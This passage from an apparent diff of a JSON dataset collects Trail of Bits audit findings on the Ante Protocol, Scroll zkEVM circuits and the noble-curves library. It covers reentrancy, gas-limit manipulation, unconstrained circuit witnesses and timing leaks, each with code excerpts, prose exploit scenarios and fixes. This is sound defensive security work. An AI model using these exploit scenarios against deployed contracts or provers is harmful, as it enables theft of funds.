cutoffBlock) { eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add( _storedBalance(challengerInfo.userInfo[challenger], challengerInfo) ); } } } Figure 4.1: contracts/AntePool.sol#L553-L563 However, triggering an out-of-gas error would be costly to an attacker; the attacker would need to create many accounts through which to stake funds, and the amount of each stake would decay over time. Exploit Scenario The length of the challenger address array grows such that the computation of the eligibleAmount causes the block to reach its gas limit. Then, because of this Ethereum-imposed gas constraint, the entire transaction reverts, and the failing AnteTest is not marked as failing. As a result, challengers who have staked funds in anticipation of a failed test will not receive a payout. Recommendations Short term, determine the number of challengers that can enter an AntePool without rendering the _calculateChallengerEligibility functions operation too gas intensive; then, use that number as the upper limit on the number of challengers. Long term, avoid calculating every challengers proportion of _remainingStake in the same operation; instead, calculate each user's pro-rata share when he or she enters the pool and modify the challenger delay to require that a challenger register and wait 12 blocks before minting his or her pro-rata share. Upon a test failure, a challenger would burn these shares and redeem them for ether.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "2. Events emitted during critical operations omit certain details ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "Events are generally emitted for all critical state-changing operations within the system. However, the AntePoolCreated event emitted by the AntePoolFactory does not capture the address of the msg.sender that deployed the AntePool. This information would help provide a more complete audit trail in the event of an attack, as the msg.sender often refers to the externally owned account that sent the transaction but could instead refer to an intermediate smart contract address. emit AntePoolCreated(testAddr, testPool); Figure 2.1: contracts/AntePoolFactory.sol#L47 Additionally, consider having the AntePool.updateDecay method emit an event with the pool share parameters used in decay calculations. Recommendations Short term, capture the msg.sender in the AntePoolFactory.AntePoolCreated event, and have AntePool.updateDecay emit an event that includes the relevant decay calculation parameters. Long term, ensure critical state-changing operations trigger events sucient to form an audit trail in the event of a system failure. Events should capture relevant parameters to help auditors determine the cause of failure.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "3. Insu\u0000cient gas can cause AnteTests to produce false positives ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "Once challengers have staked ether and the challenger delay has passed, they can submit transactions to predict that a test will fail and to earn a bonus if it does. An attacker could manipulate the result of an AnteTest by providing a limited amount of gas to the checkTest function, forcing the test to fail. This is because the anteTest.checkTestPasses function receives 63/64 of the gas provided to checkTest (per the 63/64 gas forwarding rule), which may not be enough. This issue stems from the use of a try-catch statement in the _checkTestNoRevert function, which causes the function to return false when an EVM exception occurs, indicating a test failure. We set the diculty of this nding to high, as the outer call will also revert with an out-of-gas exception if it requires more than 1/64 of the gas; however, other factors (e.g., the block gas limit) may change in the future, allowing for a successful exploitation. if (!_checkTestNoRevert()) { updateDecay(); verifier = msg.sender; failedBlock = block.number; pendingFailure = true; _calculateChallengerEligibility(); _bounty = getVerifierBounty(); uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount); _remainingStake = totalStake.sub(_bounty); Figure 3.1: Part of the checkTest function /// @return passes bool if the Ante Test passed function _checkTestNoRevert() internal returns (bool) { try anteTest.checkTestPasses() returns (bool passes) { return passes; } catch { return false; } } Figure 3.2: contracts/AntePool.sol#L567-L573 Exploit Scenario An attacker calculates the amount of gas required for checkTest to run out of gas in the inner call to anteTest.checkTestPasses. The test fails, and the attacker claims the verier bonus. Recommendations Short term, ensure that the AntePool reverts if the underlying AnteTest does not have enough gas to return a meaningful value. Long term, redesign the test verication mechanism such that gas usage does not cause false positives.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "5. Reentrancy into AntePool.checkTest scales challenger eligibility amount ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "A malicious AnteTest or underlying contract being tested can trigger multiple failed checkTest calls by reentering the AntePool.checkTest function. With each call, the _calculateChallengerEligibility method increases the eligibleAmount instead of resetting it, causing the eligibleAmount to scale unexpectedly with each reentrancy. function checkTest() external override testNotFailed { require(challengers.exists(msg.sender), \"ANTE: Only challengers can checkTest\"); require( block.number.sub(eligibilityInfo.lastStakedBlock[msg.sender]) > CHALLENGER_BLOCK_DELAY, \"ANTE: must wait 12 blocks after challenging to call checkTest\" ); numTimesVerified = numTimesVerified.add(1); lastVerifiedBlock = block.number; emit TestChecked(msg.sender); if (!_checkTestNoRevert()) { updateDecay(); verifier = msg.sender; failedBlock = block.number; pendingFailure = true; _calculateChallengerEligibility(); _bounty = getVerifierBounty(); uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount); _remainingStake = totalStake.sub(_bounty); emit FailureOccurred(msg.sender); } } Figure 5.1: contracts/AntePool.sol#L292-L316 function _calculateChallengerEligibility() internal { uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY); for (uint256 i = 0; i < challengers.addresses.length; i++) { address challenger = challengers.addresses[i]; if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) { eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add( _storedBalance(challengerInfo.userInfo[challenger], challengerInfo) ); } } } Figure 5.2: contracts/AntePool.sol#L553-L563 Appendix D includes a proof-of-concept AnteTest contract and hardhat unit test that demonstrate this issue. Exploit Scenario An attacker deploys an AnteTest contract or a vulnerable contract to be tested. The attacker directs the deployed contract to call AntePool.stake, which registers the contract as a challenger. The malicious contract then reenters AntePool.checkTest and triggers multiple failures within the same call stack. As a result, the AntePool makes multiple calls to the _calculateChallengerEligibility method, which increases the challenger eligibility amount with each call. This results in a greater-than-expected loss of pool funds. Recommendations Short term, implement checks to ensure the AntePool contracts methods cannot be reentered while checkTest is executing. Long term, ensure that all calls to external contracts are reviewed for reentrancy risks. To prevent a reentrancy from causing undened behavior in the system, ensure state variables are updated in the appropriate order; alternatively (and if sensible) disallow reentrancy altogether. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "1. PoseidonLookup is not implemented ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "Poseidon hashing is performed within the MPT circuit by performing lookups into a Poseidon table via the PoseidonLookup trait, shown in gure 1.1. /// Lookup represent the poseidon table in zkevm circuit pub trait PoseidonLookup { fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) { let (fixed, adv) = self.lookup_columns_generic(); (FixedColumn(fixed), adv.map(AdviceColumn)) } fn lookup_columns_generic(&self) -> (Column, [Column; 5]) { let (fixed, adv) = self.lookup_columns(); (fixed.0, adv.map(|col| col.0)) } } Figure 1.1: src/gadgets/poseidon.rs#1121 This trait is not implemented by any types except the testing-only PoseidonTable shown in gure 1.2, which does not constrain its columns at all. #[cfg(test)] #[derive(Clone, Copy)] pub struct PoseidonTable { q_enable: FixedColumn, left: AdviceColumn, right: AdviceColumn, hash: AdviceColumn, control: AdviceColumn, head_mark: AdviceColumn, } #[cfg(test)] impl PoseidonTable { pub fn configure(cs: &mut ConstraintSystem) -> Self { let [hash, left, right, control, head_mark] = [0; 5].map(|_| AdviceColumn(cs.advice_column())); Self { left, right, hash, control, head_mark, q_enable: FixedColumn(cs.fixed_column()), } } Figure 1.2: src/gadgets/poseidon.rs#5680 The rest of the codebase treats this trait as a black-box implementation, so this does not seem to cause correctness problems elsewhere. However, it does limit ones ability to test some negative cases, and it makes the test coverage rely on the correctness of the PoseidonTable structs witness generation. Recommendations Short term, create a concrete implementation of the PoseidonLookup trait to enable full testing of the MPT circuit. Long term, ensure that all parts of the MPT circuit are tested with both positive and negative tests.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "2. IsZeroGadget does not constrain the inverse witness when the value is zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The IsZeroGadget implementation allows for an arbitrary inverse_or_zero witness value when the value parameter is 0. The gadget returns 1 when value is 0; otherwise, it returns 0. The implementation relies on the existence of an inverse for when value is nonzero and on correctly constraining that value * (1 - value * inverse_or_zero) == 0. However, when value is 0, the constraint is immediately satised, regardless of the value of the inverse_or_zero witness. This allows an arbitrary value to be provided for that witness value. pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, value: AdviceColumn, // TODO: make this a query once Query is clonable/copyable..... ) -> Self { let inverse_or_zero = AdviceColumn(cs.advice_column()); cb.assert_zero( \"value is 0 or inverse_or_zero is inverse of value\", value.current() * (Query::one() - value.current() * inverse_or_zero.current()), ); Self { value, inverse_or_zero, } } Figure 2.1: mpt-circuit/src/gadgets/is_zero.rs#4862 Recommendations Short term, ensure that the circuit is deterministic by constraining inverse_or_zero to equal 0 when value is 0. Long term, document which circuits have nondeterministic witnesses; over time, constrain them so that all circuits have deterministic witnesses.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "3. The MPT nonexistence proof gadget is missing constraints specied in the documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The gadget for checking the consistency of nonexistence proofs is missing several constraints related to type 2 nonexistence proofs. The circuit specication includes constraints for the nonexistence of path proofs that are not included in the implementation. This causes the witness values to be unconstrained in some cases. For example, the following constraints are specied: other_key_hash should equal 0 when key does not equal other_key. other_leaf_data_hash should equal the hash of the empty node (pointer by other_key). Neither of these constraints is enforced in the implementation: this is because the implementation has no explicit constraints imposed for the type 2 nonexistence proofs. Figure 3.1 shows that the circuit constrains these values only for type 1 proofs. pub fn configure( cb: &mut ConstraintBuilder, value: SecondPhaseAdviceColumn, key: AdviceColumn, other_key: AdviceColumn, key_equals_other_key: IsZeroGadget, hash: AdviceColumn, hash_is_zero: IsZeroGadget, other_key_hash: AdviceColumn, other_leaf_data_hash: AdviceColumn, poseidon: &impl PoseidonLookup, ) { cb.assert_zero(\"value is 0 for empty node\", value.current()); cb.assert_equal( \"key_minus_other_key = key - other key\", key_equals_other_key.value.current(), key.current() - other_key.current(), ); cb.assert_equal( \"hash_is_zero input == hash\", hash_is_zero.value.current(), hash.current(), ); let is_type_1 = !key_equals_other_key.current(); let is_type_2 = hash_is_zero.current(); cb.assert_equal( \"Empty account is either type 1 xor type 2\", Query::one(), Query::from(is_type_1.clone()) + Query::from(is_type_2), ); cb.condition(is_type_1, |cb| { cb.poseidon_lookup( \"other_key_hash == h(1, other_key)\", [Query::one(), other_key.current(), other_key_hash.current()], poseidon, ); cb.poseidon_lookup( \"hash == h(key_hash, other_leaf_data_hash)\", [ other_key_hash.current(), other_leaf_data_hash.current(), hash.current(), ], poseidon, ); }); Figure 3.1: mpt-circuit/src/gadgets/mpt_update/nonexistence_proof.rs#754 The Scroll team has stated that this is a specication error and that the missing constraints do not impact the soundness of the circuit. Recommendations Short term, update the specication to remove the description of these constraints; ensure that the documentation is kept updated. Long term, add positive and negative tests for both types of nonexistence proofs.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "4. Discrepancies between the MPT circuit specication and implementation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The MPT circuit implementation is not faithful to the circuit specication in many areas and does not contain comments for the constraints that are either missing from the implementation or that diverge from those in the specication. The allowed segment transitions depend on the proof type. For the NonceChanged proof type, the specication states that the Start segment type can transition to Start and that the AccountLeaf0 segment type also can transition to Start. However, neither of these paths is allowed in the implementation. MPTProofType::NonceChanged | MPTProofType::BalanceChanged | MPTProofType::CodeSizeExists | MPTProofType::CodeHashExists => [ SegmentType::Start, vec![ SegmentType::AccountTrie, // mpt has > 1 account SegmentType::AccountLeaf0, // mpt has <= 1 account ], ( ), ( SegmentType::AccountTrie, vec![ SegmentType::AccountTrie, SegmentType::AccountLeaf0, SegmentType::Start, // empty account proof ], ), (SegmentType::AccountLeaf0, vec![SegmentType::AccountLeaf1]), (SegmentType::AccountLeaf1, vec![SegmentType::AccountLeaf2]), (SegmentType::AccountLeaf2, vec![SegmentType::AccountLeaf3]), (SegmentType::AccountLeaf3, vec![SegmentType::Start]), Figure 4.1: mpt-circuit/src/gadgets/mpt_update/segment.rs#20 Figure 4.2: Part of the MPT specication (spec/mpt-proof.md#L318-L328) The transitions allowed for the PoseidonCodeHashExists proof type also do not match: the specication states that it has the same transitions as the NonceChanged proof type, but the implementation has dierent transitions. The key depth direction checks also do not match the specication. The specication states that the depth parameter should be used but the implementation uses depth - 1. cb.condition(is_trie.clone(), |cb| { cb.add_lookup( \"direction is correct for key and depth\", [key.current(), depth.current() - 1, direction.current()], key_bit.lookup(), ); cb.assert_equal( \"depth increases by 1 in trie segments\", depth.current(), depth.previous() + 1, ); cb.condition(path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( \"direction is correct for other_key and depth\", [ other_key.current(), depth.current() - 1, Figure 4.3: mpt-circuit/src/gadgets/mpt_update.rs#188 Figure 4.4: Part of the MPT specication (spec/mpt-proof.md#L279-L282) Finally, the specication states that when a segment type is a non-trie type, the value of key should be constrained to 0, but this constraint is omitted from the implementation. cb.condition(!is_trie, |cb| { cb.assert_zero(\"depth is 0 in non-trie segments\", depth.current()); }); Figure 4.5: mpt-circuit/src/gadgets/mpt_update.rs#212214 Figure 4.6: Part of the MPT specication (spec/mpt-proof.md#L284-L286) Recommendations Short term, review the specication and ensure its consistency. Match the implementation with the specication, and document possible optimizations that remove constraints, detailing why they do not cause soundness issues. Long term, include both positive and negative tests for all edge cases in the specication.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "5. Redundant lookups in the Word RLC circuit ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The Word RLC circuit has two redundant lookups into the BytesLookup table. The Word RLC circuit combines the random linear combination (RLC) for the lower and upper 16 bytes of a word into a single RLC value. For this, it checks that the lower and upper word segments are 16 bytes by looking into the BytesLookup table, and it checks that their RLCs are correctly computed by looking into the RlcLookup table. However, the lookup into the RlcLookup table will also ensure that the lower and upper segments of the word have the correct 16 bytes, making the rst two lookups redundant. pub fn configure( cb: &mut ConstraintBuilder, [word_hash, high, low]: [AdviceColumn; 3], [rlc_word, rlc_high, rlc_low]: [SecondPhaseAdviceColumn; 3], poseidon: &impl PoseidonLookup, bytes: &impl BytesLookup, rlc: &impl RlcLookup, randomness: Query, ) { cb.add_lookup( \"old_high is 16 bytes\", [high.current(), Query::from(15)], bytes.lookup(), ); cb.add_lookup( \"old_low is 16 bytes\", [low.current(), Query::from(15)], bytes.lookup(), ); cb.poseidon_lookup( \"word_hash = poseidon(high, low)\", [high.current(), low.current(), word_hash.current()], poseidon, ); cb.add_lookup( \"rlc_high = rlc(high) and high is 16 bytes\", [high.current(), Query::from(15), rlc_high.current()], rlc.lookup(), ); cb.add_lookup( \"rlc_low = rlc(low) and low is 16 bytes\", [low.current(), Query::from(15), rlc_low.current()], rlc.lookup(), Figure 5.1: mpt-circuit/src/gadgets/mpt_update/word_rlc.rs#1649 Although the WordRLC::configure function receives two dierent lookup objects, bytes and rlc, they are instantiated with the same concrete lookup: let mpt_update = MptUpdateConfig::configure( cs, &mut cb, poseidon, &key_bit, &byte_representation, &byte_representation, &rlc_randomness, &canonical_representation, ); Figure 5.2: mpt-circuit/src/mpt.rs#6069 We also note that the labels refer to the upper and lower bytes as old_high and old_low instead of just high and low. Recommendations Short term, determine whether both the BytesLookup and RlcLookup tables are needed for this circuit, and refactor the circuit accordingly, removing the redundant constraints. Long term, review the codebase for duplicated or redundant constraints using manual and automated methods.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "6. The NonceChanged conguration circuit does not constrain the new value nonce value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The NonceChanged conguration circuit does not constrain the config.new_value parameter to be 8 bytes. Instead, there is a duplicated constraint for config.old_value: SegmentType::AccountLeaf3 => { cb.assert_zero(\"direction is 0\", config.direction.current()); let old_code_size = (config.old_hash.current() - config.old_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); let new_code_size = (config.new_hash.current() - config.new_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); cb.condition( config.path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( \"old nonce is 8 bytes\", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); cb.add_lookup( \"new nonce is 8 bytes\", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.1: mpt-circuit/src/gadgets/mpt_update.rs#12091228 This means that a malicious prover could update the Account node with a value of arbitrary length for the Nonce and Codesize parameters. The same constraint (with a correct label but incorrect value) is used in the ExtensionNew path type: cb.condition( config.path_type.current_matches(&[PathType::ExtensionNew]), |cb| { cb.add_lookup( \"new nonce is 8 bytes\", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.2: mpt-circuit/src/gadgets/mpt_update.rs#12411248 Exploit Scenario A malicious prover uses the NonceChanged proof to update the nonce with a larger than expected value. Recommendations Short term, enforce the constraint for the config.new_value witness. Long term, add positive and negative testing of the edge cases present in the specication. For both the Common and ExtensionNew path types, there should be a negative test that fails because it changes the new nonce to a value larger than 8 bytes. Use automated testing tools like Semgrep to nd redundant and duplicate constraints, as these could indicate that a constraint is incorrect.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "7. The Copy circuit does not totally enforce the tag values ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The Copy table includes a tag column that indicates the type of data for that particular row. However, the Copy circuit tag validation function does not totally ensure that the tag matches one of the predened tag values. The implementation uses the copy_gadgets::constrain_tag function to bind the is_precompiled, is_tx_calldata, is_bytecode, is_memory, and is_tx_log witnesses to the actual tag value. However, the code does not ensure that exactly one of these Boolean values is true. #[allow(clippy::too_many_arguments)] pub fn constrain_tag( meta: &mut ConstraintSystem, q_enable: Column, tag: BinaryNumberConfig, is_precompiled: Column, is_tx_calldata: Column, is_bytecode: Column, is_memory: Column, is_tx_log: Column, ) { meta.create_gate(\"decode tag\", |meta| { let enabled = meta.query_fixed(q_enable, CURRENT); let is_precompile = meta.query_advice(is_precompiled, CURRENT); let is_tx_calldata = meta.query_advice(is_tx_calldata, CURRENT); let is_bytecode = meta.query_advice(is_bytecode, CURRENT); let is_memory = meta.query_advice(is_memory, CURRENT); let is_tx_log = meta.query_advice(is_tx_log, CURRENT); let precompiles = sum::expr([ tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ecrecover), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Sha256), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ripemd160), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Identity), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Modexp), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Add), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Mul), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Bn128Pairing), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Blake2F), CURRENT)(meta), ]); vec![ // Match boolean indicators to their respective tag values. enabled.expr() * (is_precompile - precompiles), enabled.expr() * (is_tx_calldata - tag.value_equals(CopyDataType::TxCalldata, CURRENT)(meta)), enabled.expr() CURRENT)(meta)), * (is_bytecode - tag.value_equals(CopyDataType::Bytecode, enabled.expr() * (is_memory - tag.value_equals(CopyDataType::Memory, CURRENT)(meta)), enabled.expr() * (is_tx_log - tag.value_equals(CopyDataType::TxLog, CURRENT)(meta)), ] }); } Figure 7.1: copy_circuit/copy_gadgets.rs#1362 In fact, the tag value could equal CopyDataType::RlcAcc, as in the SHA3 gadget. The CopyDataType::Padding value is also not currently matched. In the current state of the codebase, this issue does not appear to cause any soundness issues because the lookups into the Copy table either use a statically set source and destination tag or, as in the case of precompiles, the value is correctly bounded and does not pose an avenue of attack for a malicious prover. We also observe that the Copy circuit specication mentions a witness value for the is_rlc_acc case, but this is not reected in the code. Recommendations Short term, ensure that the tag column is fully constrained. Review the circuit specication and match the implementation with the specication, documenting possible optimizations that remove constraints and detailing why they do not cause soundness issues. Long term, include negative tests for an unintended tag value.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "8. The invalid creation error handling circuit is unconstrained ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The invalid creation error handling circuit does not constrain the rst byte of the actual memory to be 0xef as intended. This allows a malicious prover to redirect the EVM execution to a halt after the CREATE opcode is called, regardless of the memory value. The ErrorInvalidCreationCodeGadget circuit was updated to accommodate the memory addressing optimizations. However, in doing so, the first_byte witness value that was bound to the memorys rst byte is no longer bound to it. Therefore, a malicious prover can always satisfy the circuit constraints, even if they are not in an error state after the CREATE opcode is called. fn configure(cb: &mut EVMConstraintBuilder) -> Self { let opcode = cb.query_cell(); let first_byte = cb.query_cell(); //let address = cb.query_word_rlc(); let offset = cb.query_word_rlc(); let length = cb.query_word_rlc(); let value_left = cb.query_word_rlc(); cb.stack_pop(offset.expr()); cb.stack_pop(length.expr()); cb.require_true(\"is_create is true\", cb.curr.state.is_create.expr()); let address_word = MemoryWordAddress::construct(cb, offset.clone()); // lookup memory for first word cb.memory_lookup( 0.expr(), address_word.addr_left(), value_left.expr(), value_left.expr(), None, ); // let first_byte = value_left.cells[address_word.shift()]; // constrain first byte is 0xef let is_first_byte_invalid = IsEqualGadget::construct(cb, first_byte.expr(), 0xef.expr()); cb.require_true( \"is_first_byte_invalid is true\", is_first_byte_invalid.expr(), ); Figure 8.1: evm_circuit/execution/error_invalid_creation_code.rs#3667 Exploit Scenario A malicious prover generates two dierent proofs for the same transaction, one leading to the error state, and the other successfully executing the CREATE opcode. Distributing these proofs to two ends of a bridge leads to state divergence and a loss of funds. Recommendations Short term, bind the first_byte witness value to the memory value; ensure that the successful CREATE end state checks that the rst byte is dierent from 0xef. Long term, investigate ways to generate malicious traces that could be added to the test suite; every time a new soundness issue is found, create such a malicious trace and add it to the test suite.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "9. The OneHot primitive allows more than one value at once ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The OneHot primitive uses BinaryQuery values as witness values. However, despite their name, these values are not constrained to be Boolean values, allowing a malicious prover to choose more than one hot value in the data structure. impl OneHot { pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, ) -> Self { let mut columns = HashMap::new(); for variant in Self::nonfirst_variants() { columns.insert(variant, cb.binary_columns::<1>(cs)[0]); } let config = Self { columns }; cb.assert( \"sum of binary columns in OneHot is 0 or 1\", config.sum(0).or(!config.sum(0)), ); config } Figure 9.1: mpt-circuit/src/gadgets/one_hot.rs#1430 The reason the BinaryQuery values are not constrained to be Boolean is because the BinaryColumn conguration does not constrain the advice values to be Boolean, and the conguration is simply a type wrapper around the Column type. This provides no guarantees to the users of this API, who might assume that these values are guaranteed to be Boolean. pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); // TODO: constrain to be binary here... // cb.add_constraint() Self(advice_column) } Figure 9.2: mpt-circuit/src/constraint_builder/binary_column.rs#2937 The OneHot primitive is used to implement the Merkle pathchecking state machine, including critical properties such as requiring the key and other_key columns to remain unchanged along a given Merkle path calculation, as shown in gure 9.3. cb.condition( !segment_type.current_matches(&[SegmentType::Start, SegmentType::AccountLeaf3]), |cb| { cb.assert_equal( \"key can only change on Start or AccountLeaf3 rows\", key.current(), key.previous(), ); cb.assert_equal( \"other_key can only change on Start or AccountLeaf3 rows\", other_key.current(), other_key.previous(), ); }, ); Figure 9.3: mpt-circuit/src/gadgets/mpt_update.rs#170184 We did not develop a proof-of-concept exploit for the path-checking table, so it may be the case that the constraint in gure 9.3 is not exploitable due to other constraints. However, if at any point it is possible to match both SegmentType::Start and some other segment type (such as by setting one OneHot cell to 1 and another to -1), a malicious prover would be able to change the key partway through and forge Merkle updates. Exploit Scenario A malicious prover uses the OneHot soundness issue to bypass constraints, ensuring that the key and other_key columns remain unchanged along a given Merkle path calculation. This allows the attacker to successfully forge MPT update proofs that update an arbitrary key. Recommendations Short term, add constraints that ensure that the advice values from these columns are Boolean. Long term, add positive and negative tests ensuring that these constraint builders operate according to their expectations.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "10. Intermediate columns are not explicit ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The MPT update circuit includes two arrays of intermediate value columns, as shown in gure 10.1. intermediate_values: [AdviceColumn; 10], // can be 4? second_phase_intermediate_values: [SecondPhaseAdviceColumn; 10], // 4? Figure 10.1: mpt-circuit/src/gadgets/mpt_update.rs#6566 These columns are used as general-use cells for values that are only conditionally needed in a given row, reducing the total number of columns needed. For example, gure 10.2 shows that intermediate_values[0] is used for the address value in rows that match SegmentType::Start, but as shown in gure 10.3, rows representing the SegmentType::AccountLeaf3 state of a Keccak code-hash proof use that same slot for the old_high value. let address = self.intermediate_values[0].current() * is_start(); Figure 10.2: mpt-circuit/src/gadgets/mpt_update.rs#78 SegmentType::AccountLeaf3 => { cb.assert_equal(\"direction is 1\", config.direction.current(), Query::one()); let [old_high, old_low, new_high, new_low, ..] = config.intermediate_values; Figure 10.3: mpt-circuit/src/gadgets/mpt_update.rs#16321635 In some cases, cells of intermediate_values are used starting from the end of the intermediate_values column, such as the other_key_hash and other_leaf_data_hash values in PathType::ExtensionOld rows, as illustrated in gure 10.4. let [.., key_equals_other_key, new_hash_is_zero] = config.is_zero_gadgets; let [.., other_key_hash, other_leaf_data_hash] = config.intermediate_values; nonexistence_proof::configure( cb, config.new_value, config.key, config.other_key, key_equals_other_key, config.new_hash, new_hash_is_zero, other_key_hash, other_leaf_data_hash, poseidon, ); Figure 10.4: mpt-circuit/src/gadgets/mpt_update.rs#10361049 Although we did not nd any mistakes such as misused columns, this pattern is ad hoc and error-prone, and evaluating the correctness of this pattern requires checking every individual use of intermediate_values. Recommendations Short term, document the assignment of all intermediate_values columns in each relevant case. Long term, consider using Rust types to express the dierent uses of the various intermediate_values columns. For example, one could dene an IntermediateValues enum, with cases like StartRow { address: &AdviceColumn } and ExtensionOld { other_key_hash: &AdviceColumn, other_leaf_data_hash: &AdviceColumn }, and a single function fn parse_intermediate_values(segment_type: SegmentType, path_type: PathType, columns: &[AdviceColumn; 10]) -> IntermediateValues. Then, the correct assignment and use of intermediate_values columns can be audited only by checking parse_intermediate_values. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "1. Timing issues ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf", + "body": "The library provides a scalar multiplication routine that aims to keep the number of BigInteger operations constant, in order to be (close to) constant-time. However, there are some locations in the implementation where timing dierences can cause issues: Pre-computed point look-up during scalar multiplication (gure 1.1) Second part of signature generation Tonelli-Shanks square root computation // Check if we're onto Zero point. // Add random point inside current window to f. const offset1 = offset; const offset2 = offset + Math .abs(wbits) - 1 ; // -1 because we skip zero const cond1 = window % 2 !== 0 ; const cond2 = wbits < 0 ; if (wbits === 0 ) { // The most important part for const-time getPublicKey f = f.add(constTimeNegate(cond1, precomputes[offset1])); } else { p = p.add(constTimeNegate(cond2, precomputes[offset2])); } Figure 1.1: Pre-computed point lookup during scalar multiplication ( noble-curves/src/abstract/curve.ts:117128 ) The scalar multiplication routine comprises a loop, part of which is shown in Figure 1.1. Each iteration adds a selected pre-computed point to the accumulator p (or to the dummy accumulator f if relevant scalar bits are all zero). However, the array access to select the appropriate pre-computed point is not constant-time. Figure 1.2 shows how the implementation computes the second half of an ECDSA signature. 14 noble-curves Security Assessment const s = modN(ik * modN(m + modN(d * r))); // s = k^-1(m + rd) mod n Figure 1.2: Generation of the second part of the signature ( noble-curves/src/abstract/weierstrass.ts:988 ) First, the private key is multiplied by the rst half of the signature and reduced modulo the group order. Next, the message digest is added and the result is again reduced modulo the group order. If the modulo operation is not constant-time, and if an attacker can detect this timing dierence, they can perform a lattice attack to recover the signing key. The details of this attack are described in the TCHES 2019 article by Ryan . Note that the article does not show that this timing dierence attack can be practically exploited, but instead mounts a cache-timing attack to exploit it. FpSqrt is a function that computes square roots of quadratic residues over . Based on , this function chooses one of several sub-algorithms, including the value of Tonelli-Shanks. Some of these algorithms are constant-time with respect to , but some are not. In particular, the implementation of the Tonelli-Shanks algorithm has a high degree of timing variability. The FpSqrt function is used to decode compressed point representations, so it can inuence timing when handling potentially sensitive or adversarial data. Most texts consider Tonelli-Shanks the fallback algorithm when a faster or simpler algorithm is unavailable. However, Tonelli-Shanks can be used for any prime modulus Further, Tonelli-Shanks can be made 